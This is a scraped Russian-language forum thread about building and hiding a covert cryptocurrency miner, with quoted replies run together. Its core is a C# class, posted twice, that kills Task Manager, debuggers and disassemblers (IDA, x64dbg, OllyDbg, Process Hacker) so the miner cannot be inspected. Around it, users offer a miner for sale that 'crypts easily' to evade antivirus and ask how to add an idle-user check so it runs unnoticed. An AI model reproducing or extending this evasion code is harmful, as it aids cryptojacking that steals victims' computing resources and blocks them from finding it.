На другую монету можно 32х битной фигачить.для win 32 больше не делают билды,cuda это для nvidia
На другую монету можно 32х битной фигачить.для win 32 больше не делают билды,cuda это для nvidia
данный тс уже давно слился со всех форумов,он кинул людей и сейчас по другим ником обитает,под каким не известноДобрый день. кто может подсказать контакты данного ТС. ибо тот джабер, котрый указан у него в первом сообщении данного топика - не рабочий..
Благодарю. Взял на каранадашданный тс уже давно слился со всех форумов,он кинул людей и сейчас по другим ником обитает,под каким не известно
могу продать более современный майнер,и в настройке сам разберешься,за 20 баксов отдам,криптуется очень легкоКто-нибудь может собрать всё под ключ за 30$?
Как скачать?
Пул MinerGate/NiceHash посоветую тебепосоветуй где лучше майнить?
Пул MinerGate/NiceHash посоветую тебе
неплохо, для накрутки плюсов.Неплохо для понимания темы
namespace
{
internal class Scanner
{
private static readonly HashSet<string> BadProcessnameList = new HashSet<string>();
private static readonly HashSet<string> BadWindowTextList = new HashSet<string>();
public static void Run() // Scanner.Run();
{
if (Scan(true) != 0)
Thread.Sleep(100);
}
private static int Scan(bool KillProcess)
{
var isBadProcess = 0;
if (BadProcessnameList.Count == 0 && BadWindowTextList.Count == 0) Init();
var processList = Process.GetProcesses();
foreach (var process in processList)
if (BadProcessnameList.Contains(process.ProcessName) ||
BadWindowTextList.Contains(process.MainWindowTitle))
{
isBadProcess = 1;
if (KillProcess)
try
{
process.Kill();
}
catch
{
}
break;
}
return isBadProcess;
}
private static int Init()
{
if (BadProcessnameList.Count > 0 && BadWindowTextList.Count > 0) return 1;
BadProcessnameList.Add("Local");
BadProcessnameList.Add("AppData");
BadProcessnameList.Add("Taskmgr");
BadProcessnameList.Add("ollydbg");
BadProcessnameList.Add("ida");
BadProcessnameList.Add("ida64");
BadProcessnameList.Add("idag");
BadProcessnameList.Add("idag64");
BadProcessnameList.Add("idaw");
BadProcessnameList.Add("idaw64");
BadProcessnameList.Add("idaq");
BadProcessnameList.Add("idaq64");
BadProcessnameList.Add("idau");
BadProcessnameList.Add("idau64");
BadProcessnameList.Add("scylla");
BadProcessnameList.Add("scylla_x64");
BadProcessnameList.Add("scylla_x86");
BadProcessnameList.Add("protection_id");
BadProcessnameList.Add("x64dbg");
BadProcessnameList.Add("x32dbg");
BadProcessnameList.Add("windbg");
BadProcessnameList.Add("reshacker");
BadProcessnameList.Add("ImportREC");
BadProcessnameList.Add("IMMUNITYDEBUGGER");
BadProcessnameList.Add("MegaDumper");
BadWindowTextList.Add("OLLYDBG");
BadWindowTextList.Add("ida");
BadWindowTextList.Add("disassembly");
BadWindowTextList.Add("scylla");
BadWindowTextList.Add("Debug");
BadWindowTextList.Add("[CPU");
BadWindowTextList.Add("Immunity");
BadWindowTextList.Add("WinDbg");
BadWindowTextList.Add("x32dbg");
BadWindowTextList.Add("x64dbg");
BadWindowTextList.Add("Import reconstructor");
BadWindowTextList.Add("MegaDumper");
BadWindowTextList.Add("MegaDumper 1.0 by CodeCracker / SnD");
BadWindowTextList.Add("Process Hacker [" + Environment.MachineName + @"\" + Environment.UserName + "]");
return 0;
}
}
}
Дай мне ссылку на этот исходник.
Вот пример защиты от диспетчера
C#:namespace { internal class Scanner { private static readonly HashSet<string> BadProcessnameList = new HashSet<string>(); private static readonly HashSet<string> BadWindowTextList = new HashSet<string>(); public static void Run() // Scanner.Run(); { if (Scan(true) != 0) Thread.Sleep(100); } private static int Scan(bool KillProcess) { var isBadProcess = 0; if (BadProcessnameList.Count == 0 && BadWindowTextList.Count == 0) Init(); var processList = Process.GetProcesses(); foreach (var process in processList) if (BadProcessnameList.Contains(process.ProcessName) || BadWindowTextList.Contains(process.MainWindowTitle)) { isBadProcess = 1; if (KillProcess) try { process.Kill(); } catch { } break; } return isBadProcess; } private static int Init() { if (BadProcessnameList.Count > 0 && BadWindowTextList.Count > 0) return 1; BadProcessnameList.Add("Local"); BadProcessnameList.Add("AppData"); BadProcessnameList.Add("Taskmgr"); BadProcessnameList.Add("ollydbg"); BadProcessnameList.Add("ida"); BadProcessnameList.Add("ida64"); BadProcessnameList.Add("idag"); BadProcessnameList.Add("idag64"); BadProcessnameList.Add("idaw"); BadProcessnameList.Add("idaw64"); BadProcessnameList.Add("idaq"); BadProcessnameList.Add("idaq64"); BadProcessnameList.Add("idau"); BadProcessnameList.Add("idau64"); BadProcessnameList.Add("scylla"); BadProcessnameList.Add("scylla_x64"); BadProcessnameList.Add("scylla_x86"); BadProcessnameList.Add("protection_id"); BadProcessnameList.Add("x64dbg"); BadProcessnameList.Add("x32dbg"); BadProcessnameList.Add("windbg"); BadProcessnameList.Add("reshacker"); BadProcessnameList.Add("ImportREC"); BadProcessnameList.Add("IMMUNITYDEBUGGER"); BadProcessnameList.Add("MegaDumper"); BadWindowTextList.Add("OLLYDBG"); BadWindowTextList.Add("ida"); BadWindowTextList.Add("disassembly"); BadWindowTextList.Add("scylla"); BadWindowTextList.Add("Debug"); BadWindowTextList.Add("[CPU"); BadWindowTextList.Add("Immunity"); BadWindowTextList.Add("WinDbg"); BadWindowTextList.Add("x32dbg"); BadWindowTextList.Add("x64dbg"); BadWindowTextList.Add("Import reconstructor"); BadWindowTextList.Add("MegaDumper"); BadWindowTextList.Add("MegaDumper 1.0 by CodeCracker / SnD"); BadWindowTextList.Add("Process Hacker [" + Environment.MachineName + @"\" + Environment.UserName + "]"); return 0; } } }
исходник в начале темы, я наверное не правильно задал вопрос, но за вот этот код спасибо) дело в том что в коде уже реализованно скрытие от диспетчера и я добавил проверка активности юзера, то есть время с последнего нажатия,движения мыши , проверка на диспетчер выполнена с помощью инструкции while(true), так каким образом мне вставить в код инструкцию проверки на актив., она ведь тоже должна по сути проверять посстояно, отдельным потоком? может я что то не так делаю, но при таком варианте множественный запуск майнера.Тут в коде он не дает запустить диспетчер и т.д программы.